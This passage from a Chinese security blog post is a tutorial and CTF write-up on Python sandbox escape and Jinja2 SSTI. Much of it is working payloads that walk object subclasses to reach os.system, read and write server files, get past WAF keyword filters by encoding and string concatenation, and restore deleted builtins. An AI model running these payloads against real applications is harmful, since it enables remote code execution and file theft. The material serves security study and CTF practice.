<h5 id="提供的python交互式shell"><a href="#提供的python交互式shell" class="headerlink" title="提供的python交互式shell"></a><strong>提供的python交互式shell</strong></h5><p> 这种情况较为少见,但是总体来说根据业务场景的不同一般会做很多的限制,但总体来说还是比较容易突破防御的</p>
<h5 id="SSTI-服务端模板注入"><a href="#SSTI-服务端模板注入" class="headerlink" title="SSTI(服务端模板注入)"></a><strong>SSTI(服务端模板注入)</strong></h5><p> SSTI的情况下,模板的解析就是在一个被限制的环境中的 在flask框架动态拼接模板的时候,使用沙盒逃逸是及其致命的,flask一般直接部署在物理机器上面,getshell可以拿到很大的权限.和常见Web注入的成因一样，也是服务端接收了用户的输入，将其作为 Web 应用模板内容的一部分，在进行目标编译渲染的过程中，执行了用户插入的恶意内容，因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。</p>
<p>python jinja2注入参考: <a href="http://www.freebuf.com/articles/system/97146.html" target="_blank" rel="noopener">http://www.freebuf.com/articles/system/97146.html</a></p>
<h4 id="正文："><a href="#正文：" class="headerlink" title="正文："></a><strong>正文：</strong></h4><p>通过以上分析，我们大概了解了python沙盒逃逸的原理，通过python内建函数和类继承的特性(事实上通过我们这样分析，其实我们知道不知python有这样的特性，java，js也有，也就引出了同样机制语言运行环境的安全性问题）。其实就像一棵大树，它是用众多模块组成，但是这棵树总有那么多个基础模块不止一个部位用。对于python来说，映射为那些被其他内建函数导入的模块，如与系统交互的os，sys库，当利用这个特性时，不须导入os库，只需通过引用的方式即可。</p>
<h5 id="实例演示："><a href="#实例演示：" class="headerlink" title="实例演示："></a><strong>实例演示：</strong></h5><p>一般想要 GetShell 引用下面这三个库就行了</p>
<ul>
<li>os</li>
<li>subprocess</li>
<li>commands</li>
</ul>
<p>但是当这三个库都被禁用的时候还有另一种方法就是上面提到的魔术代码, 其中有一些内置的模块已经提前加载了 os</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;<span class="class"><span class="keyword">class</span> '<span class="title">site</span>.<span class="title">_Printer</span>'&gt;</span></span><br><span class="line"><span class="class">&lt;<span class="title">class</span> '<span class="title">site</span>.<span class="title">Quitter</span>'&gt;</span></span><br><span class="line"><span class="class">&lt;<span class="title">class</span> '<span class="title">warnings</span>.<span class="title">catch_warnings</span>'&gt;</span></span><br></pre></td></tr></table></figure>
<p>在这里我使用 warnings.catch_warnings 做介绍:<br>首先获取 warnings.catch_warnings 在 object 类中的位置</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> warnings</span><br><span class="line">[].__class__.__base__.__subclasses__().index(warnings.catch_warnings)</span><br><span class="line"><span class="number">60</span></span><br><span class="line">[].__class__.__base__.__subclasses__()[<span class="number">60</span>]</span><br><span class="line">&lt;<span class="class"><span class="keyword">class</span> '<span class="title">warnings</span>.<span class="title">catch_warnings</span>'&gt;</span></span><br><span class="line"><span class="class">[].<span class="title">__class__</span>.<span class="title">__base__</span>.<span class="title">__subclasses__</span><span class="params">()</span>[60].<span class="title">__init__</span>.<span class="title">func_globals</span>.<span class="title">keys</span><span class="params">()</span></span></span><br><span class="line">['filterwarnings', 'once_registry', 'WarningMessage', '_show_warning', 'filters', '_setoption', 'showwarning', '__all__', 'onceregistry', '__package__', 'simplefilter', 'default_action', '_getcategory', '__builtins__', 'catch_warnings', '__file__', 'warnpy3k', 'sys', '__name__', 'warn_explicit', 'types', 'warn', '_processoptions', 'defaultaction', '__doc__', 'linecache', '_OptionError', 'resetwarnings', 'formatwarning', '_getaction']</span><br></pre></td></tr></table></figure>
<p>查看 linecache(操作文件的函数）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">`[].__class__.__base__.__subclasses__([<span class="number">60</span>].__init__.func_globals[<span class="string">'linecache'</span>].__dict__.keys()`</span><br><span class="line">`[<span class="string">'updatecache'</span>, <span class="string">'clearcache'</span>, <span class="string">'__all__'</span>, <span class="string">'__builtins__'</span>, <span class="string">'__file__'</span>, <span class="string">'cache'</span>, <span class="string">'checkcache'</span>, <span class="string">'getline'</span>, <span class="string">'__package__'</span>, <span class="string">'sys'</span>, <span class="string">'getlines'</span>, <span class="string">'__name__'</span>, <span class="string">'os'</span>, <span class="string">'__doc__'</span>]`</span><br></pre></td></tr></table></figure>
<p>可以看到这里调用了 os 模块, 所以可以直接调用 os 模块</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">a=[].__class__.__base__.__subclasses__()[<span class="number">60</span>].__init__.func_globals[<span class="string">'linecache'</span>].__dict__.values()[<span class="number">12</span>]</span><br><span class="line"></span><br><span class="line">a</span><br><span class="line">&lt;module <span class="string">'os'</span> <span class="keyword">from</span> <span class="string">'*****\python27\lib\os.pyc'</span>&gt;</span><br></pre></td></tr></table></figure>
<p>接着要调用 os 的 system 方法, 先查看 system 的位置:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">a.__dict__.keys().index(<span class="string">'system'</span>)</span><br><span class="line"><span class="number">79</span></span><br><span class="line"> a.__dict__.keys()[<span class="number">79</span>]</span><br><span class="line"><span class="string">'system'</span></span><br><span class="line"> b=a.__dict__.values()[<span class="number">79</span>]</span><br><span class="line"> b</span><br><span class="line">&lt;built-<span class="keyword">in</span> function system&gt;</span><br><span class="line"> b(<span class="string">'whoami'</span>)</span><br></pre></td></tr></table></figure>
<h5 id="Waf-Bypass"><a href="#Waf-Bypass" class="headerlink" title="Waf   Bypass:"></a><strong>Waf   Bypass:</strong></h5><p>当有的字符串被 waf 的时候可以通过编码或者字符串拼接绕过<br>base64:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">().__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">40</span>](<span class="string">'r'</span>,<span class="string">'ZmxhZy50eHQ='</span>.decode(<span class="string">'base64'</span>)).read()</span><br><span class="line">相当于:</span><br><span class="line">().__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">40</span>](<span class="string">'r'</span>,<span class="string">'flag.txt'</span>)).read()</span><br></pre></td></tr></table></figure>
<p><strong>字符串拼接:</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">().__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">40</span>](<span class="string">'r'</span>,<span class="string">'fla'</span>+<span class="string">'g.txt'</span>)).read()</span><br><span class="line">相当于</span><br><span class="line">().__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">40</span>](<span class="string">'r'</span>,<span class="string">'flag.txt'</span>)).read()</span><br></pre></td></tr></table></figure>
<p><strong>reload方法：</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">del</span> __builtins__.__dict__[<span class="string">'__import__'</span>] <span class="comment"># __import__ is the function called by the import statement</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">del</span> __builtins__.__dict__[<span class="string">'eval'</span>] <span class="comment"># evaluating code could be dangerous</span></span><br><span class="line"><span class="keyword">del</span> __builtins__.__dict__[<span class="string">'execfile'</span>] <span class="comment"># likewise for executing the contents of a file</span></span><br><span class="line"><span class="keyword">del</span> __builtins__.__dict__[<span class="string">'input'</span>] <span class="comment"># Getting user input and evaluating it might be dangerous</span></span><br></pre></td></tr></table></figure>
<p>当没有过滤reload函数时，我们可以重载<strong>builtins</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reload(__builtins__)</span><br></pre></td></tr></table></figure>
<p>即可恢复删除的函数。</p>
<p>当不能通过[].<strong>class</strong>.<strong>base</strong>.<strong>subclasses</strong>([60].<strong>init</strong>.func_globals[‘linecache’].<strong>dict</strong>.values()[12]直接加载 os 模块<br>这时候可以使用getattribute+ 字符串拼接 / base64 绕过 例如:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[].__class__.__base__.__subclasses__()[<span class="number">60</span>].__init__.__getattribute__(<span class="string">'func_global'</span>+<span class="string">'s'</span>)[<span class="string">'linecache'</span>].__dict__.values()[<span class="number">12</span>]</span><br></pre></td></tr></table></figure>
<p>等价于:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[].__class__.__base__.__subclasses__()[<span class="number">60</span>].__init__.func_globals[<span class="string">'linecache'</span>].__dict__.values()[<span class="number">12</span>]</span><br></pre></td></tr></table></figure>
<p><strong>dict</strong>和<strong>globals</strong>都是字典类型，用[]键值对访问，也可以通过values(),keys()这样的方法来转换成list,通过下标来访问</p>
<p><strong>getattr</strong>() 和 <strong>getattribute</strong>()</p>
<p>python 再访问属性的方法上定义了<strong>getattr</strong>() 和 <strong>getattribute</strong>() 2种方法，其区别非常细微，但非常重要。</p>
<p> 如果某个类定义了 <strong>getattribute</strong>() 方法，在 每次引用属性或方法名称时 Python 都调用它（特殊方法名称除外，因为那样将会导致讨厌的无限循环）。<br>如果某个类定义了 <strong>getattr</strong>() 方法，Python 将只在正常的位置查询属性时才会调用它。如果实例 x 定义了属性 color， x.color 将 不会 调用x.<strong>getattr</strong>(‘color’)；而只会返回 x.color 已定义好的值。<br>这里，我们可以通过<strong>getattribute</strong>这个方法做一些事，如下面的payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">x = [x <span class="keyword">for</span> x <span class="keyword">in</span> [].__class__.__base__.__subclasses__() <span class="keyword">if</span> x.__name__ == <span class="string">'ca'</span>+<span class="string">'tch_warnings'</span>][<span class="number">0</span>].__init__</span><br><span class="line">x.__getattribute__(<span class="string">"func_global"</span>+<span class="string">"s"</span>)[<span class="string">'linecache'</span>].__dict__[<span class="string">'o'</span>+<span class="string">'s'</span>].__dict__[<span class="string">'sy'</span>+<span class="string">'stem'</span>](<span class="string">'l'</span>+<span class="string">'s'</span>)</span><br></pre></td></tr></table></figure>
<p><strong>示例payload：</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#读文件</span></span><br><span class="line">().__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">40</span>](<span class="string">r'C:\1.php'</span>).read()</span><br><span class="line"></span><br><span class="line"><span class="comment">#写文件</span></span><br><span class="line">().__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">40</span>](<span class="string">'/var/www/html/input'</span>, <span class="string">'w'</span>).write(<span class="string">'123'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#执行任意命令</span></span><br><span class="line">().__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">59</span>].__init__.func_globals.values()[<span class="number">13</span>][<span class="string">'eval       </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">'</span>](<span class="string">'__import__("os").popen("ls  /var/www/html").read()'</span> )</span><br></pre></td></tr></table></figure>
<h5 id="题目分析："><a href="#题目分析：" class="headerlink" title="题目分析："></a>题目分析：</h5><p>2018年国赛的Python沙盒题目上，import 其实整个是被阉割了。</p>
<p> 但是在Python中，原生的<strong>import</strong>是存在被引用的，只要我们找到相关对象引用就可以进一步获取我们想要的内容。</p>
<p>我们可以通过</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">print</span> ().__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">40</span>](<span class="string">"/home/ctf/sandbox.py"</span>).read()</span><br></pre></td></tr></table></figure>
<p>获取题目源码，然后进一步分析</p>
<p>发现很多库还有一些linux命令都被ban了</p>
<p><img src="https://bkog.oss-cn-shenzhen.aliyuncs.com/picture/VKxod6.png" alt></p>
<p>这里提供三种姿势，当然不止三种：</p>
<p>利用python对字符的处理：</p>
<p>payload：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">x =[x <span class="keyword">for</span> x <span class="keyword">in</span> [].__class__.__base__.__subclasses__() <span class="keyword">if</span> x.__name__ == <span class="string">'ca'</span>+<span class="string">'tch_warnings'</span>][<span class="number">0</span>].__init__<span class="comment">#遍历子类寻找warnings.catch_warnings</span></span><br><span class="line">x.__getattribute__(<span class="string">"func_global"</span>+<span class="string">"s"</span>)[<span class="string">'linecache'</span>].__dict__[<span class="string">'o'</span>+<span class="string">'s'</span>].__dict__[<span class="string">'sy'</span>+<span class="string">'stem'</span>](<span class="string">'l'</span>+<span class="string">'s'</span>)</span><br><span class="line">x.__getattribute__(<span class="string">"func_global"</span>+<span class="string">"s"</span>)[<span class="string">'linecache'</span>].__dict__[<span class="string">'o'</span>+<span class="string">'s'</span>].__dict__[<span class="string">'sy'</span>+<span class="string">'stem'</span>](<span class="string">'l'</span>+<span class="string">'s /home/ctf'</span>)</span><br><span class="line">x.__getattribute__(<span class="string">"func_global"</span>+<span class="string">"s"</span>)[<span class="string">'linecache'</span>].__dict__[<span class="string">'o'</span>+<span class="string">'s'</span>].__dict__[<span class="string">'sy'</span>+<span class="string">'stem'</span>](<span class="string">'ca'</span>+<span class="string">'t /home/ctf/flag'</span>)</span><br></pre></td></tr></table></figure>
<p><strong>间接引用</strong><br>​    在不断的dir过程中，发现<strong>closure</strong> 这个object保存了参数，可以引用原生的import</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">print __import__.__getattribute__(&apos;__clo&apos;+&apos;sure__&apos;)[0].cell_contents(&apos;o&apos;+&apos;s&apos;).__getattribute__(&apos;sy&apos;+&apos;stem&apos;)(&apos;l&apos;+&apos;s &apos;)</span><br></pre></td></tr></table></figure>
<p><strong>getattribute</strong>+ 字符串拼接:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">print</span> ().__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">59</span>].__init__.__getattribute__(<span class="string">'func_global'</span>+<span class="string">'s'</span>)[<span class="string">'linecache'</span>].__dict__[<span class="string">'o'</span>+<span class="string">'s'</span>].__dict__[<span class="string">'sy'</span>+<span class="string">'stem'</span>](<span class="string">'ca'</span>+<span class="string">'t'</span>+<span class="string">' /home/ctf/flag'</span>)</span><br></pre></td></tr></table></figure>
<h5 id="番外知识："><a href="#番外知识：" class="headerlink" title="番外知识："></a>番外知识：</h5><p>在python2.7里，<br><code>[].class.base.subclasses()</code> 里面有很多库调用了我们需要的模块os</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">/usr/lib/python2<span class="number">.7</span>/warning.py</span><br><span class="line"><span class="number">58</span>  &lt;<span class="class"><span class="keyword">class</span> '<span class="title">warnings</span>.<span class="title">WarningMessage</span>'&gt;</span></span><br><span class="line"><span class="class">59  &lt;<span class="title">class</span> '<span class="title">warnings</span>.<span class="title">catch_warnings</span>'&gt;</span></span><br><span class="line"><span class="class">40  &lt; <span class="title">type</span> '<span class="title">file</span>'&gt;</span></span><br><span class="line"><span class="class">/<span class="title">usr</span>/<span class="title">lib</span>/<span class="title">python2</span>.7/<span class="title">site</span>.<span class="title">py</span></span></span><br><span class="line"><span class="class">71  &lt;<span class="title">class</span> '<span class="title">site</span>.<span class="title">_Printer</span>'&gt;</span></span><br><span class="line"><span class="class">72  &lt;<span class="title">class</span> '<span class="title">site</span>.<span class="title">_Helper</span>'&gt;</span></span><br><span class="line"><span class="class">76  &lt;<span class="title">class</span> '<span class="title">site</span>.<span class="title">Quitter</span>'&gt;</span></span><br></pre></td></tr></table></figure>
<p> 我们来看一下<code>/usr/lib/python2.7/warning.py</code>导入的模块</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> linecache</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> types</span><br></pre></td></tr></table></figure>
<p>跟踪linecache文件<code>/usr/lib/python2.7/linecache.py</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> os</span><br></pre></td></tr></table></figure>
<p>不需要利用<code>__globals__</code>就可以执行命令的payload：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[].__class__.__base__.__subclasses__()[<span class="number">59</span>]()._module.linecache.os.system(<span class="string">'ls'</span>)</span><br></pre></td></tr></table></figure>
<h5 id="python中可以执行任意代码的神奇函数"><a href="#python中可以执行任意代码的神奇函数" class="headerlink" title="python中可以执行任意代码的神奇函数"></a>python中可以执行任意代码的神奇函数</h5><p>（1）<strong>timeit</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> timeit</span><br><span class="line">timeit.timeit(<span class="string">"__import__('os').system('dir')"</span>,number=<span class="number">1</span>)</span><br></pre></td></tr></table></figure>
<p>（2）<strong>exec</strong> 和<strong>eval</strong> 比较经典了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">eval(<span class="string">'__import__("os").system("dir")'</span>)</span><br></pre></td></tr></table></figure>
<p>（3）<strong>platform</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> platform</span><br><span class="line"><span class="keyword">print</span> platform.popen(<span class="string">'dir'</span>).read()</span><br></pre></td></tr></table></figure>
<h5 id="更多姿势："><a href="#更多姿势：" class="headerlink" title="更多姿势："></a><strong>更多姿势：</strong></h5><p>so注入参考：: <a href="https://github.com/t3ls/CISCN2018-Xopowo-writeup" target="_blank" rel="noopener">https://github.com/t3ls/CISCN2018-Xopowo-writeup</a></p>
<p>此姿势通过构造执行命令的so库，然后通过使用ctypes加载so</p>
<p>使用的类：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;type <span class="string">'file'</span>&gt;</span><br><span class="line">&lt;<span class="class"><span class="keyword">class</span> '<span class="title">ctypes</span>.<span class="title">CDLL</span>'&gt;</span></span><br><span class="line"><span class="class">&lt;<span class="title">class</span> '<span class="title">ctypes</span>.<span class="title">LibraryLoader</span>'&gt;</span></span><br></pre></td></tr></table></figure>
<h5 id="Think-one-Think"><a href="#Think-one-Think" class="headerlink" title="Think one Think:"></a><strong>Think one Think:</strong></h5><p>python沙盒基本思路：</p>
<ul>
<li><p>首先判断python版本，版本不同相应类和函数的位置也不一定相同。</p>
</li>
<li><p>接下先按经验来，比如若类中有file，考虑读写操作</p>
</li>
<li><p>若类中有<code>&lt;class &#39;warnings.WarningMessage&#39;&gt;</code>，考虑从<code>.__init__.func_globals.values()[13]</code>获取eval，map等等；又或者从<code>.__init__.func_globals[linecache]</code> 得到os。 若类中有<code>&lt;type &#39;file&#39;&gt;，&lt;class &#39;ctypes.CDLL&#39;&gt;，&lt;class &#39;ctypes.LibraryLoader&#39;&gt;</code>，考虑构造so文件。</p>
</li>
<li><p><code>timeit</code>考虑time based rce(类似sleep盲注，这里都不用我们计算时间，时间由其返回)</p>
<p> 参考链接:<a href="https://www.secpulse.com/archives/65568.html" target="_blank" rel="noopener">https://www.secpulse.com/archives/65568.html</a></p>
<p>以上方法皆不行，或者相应方法皆被删除，且不能reload时，那就只能耐下性子，淘尽沙子始得金，慢慢遍历子类，找到能用的，最后考虑利用内存破坏之类的知识。因为python模块通常也只是c的封装，所以肯定会有未发现内存破坏漏洞，利用漏洞就有可能突破python的沙盒环境。</p>
<p>  参考连接:<a href="http://developer.51cto.com/art/201710/555049.htm" target="_blank" rel="noopener">http://developer.51cto.com/art/201710/555049.htm</a></p>
</li>
</ul>

    </article>
    <!-- license  -->
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href="/2019/03/01/SQL注入回顾篇(四)/" title="SQL注入回顾篇(4)">
                    <div class="nextTitle">SQL注入回顾篇(4)</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href="/2018/09/02/萌萌哒报名系统/" title="CTF&&lctf">
                    <div class="prevTitle">CTF&&lctf</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    
    <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
    <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
    <div id="comment"></div>
    <script>
    new Valine({
        el: '#comment' ,
        notify:false, 
        verify:false, 
        appId: "FuPdFy9xCtoivKmiix3FHb4d-gzGzoHsz",
        appKey: "pAQSVceyfizzVqhmmyUQeX2j",
        placeholder: "一起唠嗑:)",
        path:window.location.pathname, 
        avatar:'mm' 
    });
    </script>


    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:7989933065@qq.com" class="iconfont-archer email" title="email"></a>
            
        
    
        
            
                <a href="//github.com/Ethancck" class="iconfont-archer github" target="_blank" title="github"></a>
            
        
    
        
            
                <span class="iconfont-archer wechat" title="wechat">
                  
                  <img class="profile-qr" src="/assets/weixin.png">
                </span>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
            
                <a href="//twitter.com/Ethan18977083" class="iconfont-archer twitter" target="_blank" title="twitter"></a>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-5"><a class="toc-link" href="#题记："><span class="toc-number">1.</span> <span class="toc-text">题记：</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#基础知识："><span class="toc-number"></span> <span class="toc-text">基础知识：</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#沙箱："><span class="toc-number">1.</span> <span class="toc-text">沙箱：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#内建名称空间-builtins"><span class="toc-number">2.</span> <span class="toc-text">内建名称空间 builtins</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#两个魔术方法"><span class="toc-number">3.</span> <span class="toc-text">两个魔术方法</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#补充："><span class="toc-number">4.</span> <span class="toc-text">补充：</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#常见的实战应用场景"><span class="toc-number"></span> <span class="toc-text">常见的实战应用场景</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#直接的代码环境"><span class="toc-number">1.</span> <span class="toc-text">直接的代码环境</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#提供的python交互式shell"><span class="toc-number">2.</span> <span class="toc-text">提供的python交互式shell</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#SSTI-服务端模板注入"><span class="toc-number">3.</span> <span class="toc-text">SSTI(服务端模板注入)</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#正文："><span class="toc-number"></span> <span class="toc-text">正文：</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#实例演示："><span class="toc-number">1.</span> <span class="toc-text">实例演示：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Waf-Bypass"><span class="toc-number">2.</span> <span class="toc-text">Waf   Bypass:</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#题目分析："><span class="toc-number">3.</span> <span class="toc-text">题目分析：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#番外知识："><span class="toc-number">4.</span> <span class="toc-text">番外知识：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#python中可以执行任意代码的神奇函数"><span class="toc-number">5.</span> <span class="toc-text">python中可以执行任意代码的神奇函数</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#更多姿势："><span class="toc-number">6.</span> <span class="toc-text">更多姿势：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Think-one-Think"><span class="toc-number">7.</span> <span class="toc-text">Think one Think:</span></a></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 27
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2019 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/30</span><a class="archive-post-title" href="/2019/05/30/强网杯web部分writeup/">强网杯web部分writeup</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/27</span><a class="archive-post-title" href="/2019/05/27/charles破解/">charles破解</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/27</span><a class="archive-post-title" href="/2019/05/27/内存取证初探/">内存取证艺术</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/27</span><a class="archive-post-title" href="/2019/05/27/Xposed 插件开发基础/">Xposed插件开发</a>
        </li>
    
    
        <li class="archive-post-item">
